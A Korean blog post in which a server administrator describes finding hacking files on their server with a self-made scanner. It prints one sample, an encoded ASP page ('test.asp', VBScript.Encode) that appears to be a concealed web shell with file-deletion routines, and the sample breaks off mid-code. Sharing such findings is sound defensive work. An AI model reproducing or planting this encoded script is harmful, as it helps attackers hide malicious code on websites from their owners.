Script Encode 를 이용한 패턴

요근래 새롭지는 않지만 해킹의 방식이 바뀐듯 합니다.

작년의 경우에는 DoS 를 제외하고는 조용했다고 볼수 있을정도로 시스템해킹이 줄었었습니다.
하지만 여전히 시도를 하고 있으며, 관리자의 방심을 통해 널리(?) 알려진 문제로 인해 시스템을
악의적인 사용자에게 빼앗기는 문제까지 발생을 할수 있으니 주의하시기 바랍니다.

저 또한 예외가 아니듯 서버내 해킹파일을 탐지하는 프로그램을 만들어서 돌렸더니,
제가 전혀 예상치 못한 부분에서 해킹파일이 무더기로 나왔습니다.

그동안 나태해져있었음을 반성하고, 분석에 들어갔습니다.


새로운 패턴하나가 있더군요.
특정경로를 입력하면 그 하위에 있는 모든 파일에서 해킹시 사용되는 문법이 있는지 체크를 하는 함수가
있더군요.  이젠 만들고 중복으로 만들었는지 확인까지 하나 봅니다. ㅎㄷㄷ;;

그리고 소스를 암호화 해서 해킹파일을 탐지할수 없도록 만드는 파일이 많이 발견되었습니다.
우연히 발견한것인데, 주로 비슷한 경로에 위치하더군요.

 test.asp

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^zkwAAA==~@#@&7"+kwW / b9Nu+mNn.,JnMCoslJB~ExKO1l^tnE@#@&7IdwKxdnc262rM+dP{~ F@#@&B{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x'xx{'x'{x'{'xx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x@#@&viP~P,~),P~~@#@&B7~,PlP@#@&EP~,P,P), ZTvc!0RZ%~@#@&BdAR:mkV,~lP^k +f@$UCD+ mKh@#@&Bxx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x'xx{'x'{x'{'xx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx@#@&@#@&vP[P상수정보P RRO O ORORR ORO RO ORR OORR ORO R OR O OO O RO ORO ORR OO RO OO RRO O ORORR ORO RO OR@#@&ZWUdDPind6zfo&SA{f&I,xJJE2VKl[&r@#@&E/W /Y,iKS}bGs(S3mzZPq}HP{J&C1lNnhHzrx1&!wsKl90WM:cC/aJ@#@&@#@&@#@&EPa,~O OO RRO O ORORR ORO RO ORR OORR ORO R OR O OO O RO ORO ORR OO RO OO RRO O @#@&P~~,s;x1OkKx~]:W-nwks+vWbVnalDt#,PE&0bVnz6ksUm:+c4ha@#@&i79ksPw?@#@&77GkhP9nV6ksnBDP@#@&idj+D~w?~{P;D+mY64N+^YvJj^MkwDrxTRsbsn?H/D+hr8%mOJ*@#@&id7[V0rsPxPUnM\nMRtlwalD4`6ks+alO4*@#@&i7dMP',ojRG+^+O+or^+cNs0bVnb@#@&d7jY~sU~{PHKY4kxT@#@&7d"+hW7+or^+P{.@#@&d2 [~s!x1YrWU~@#@&@#@&@#@&B,a~~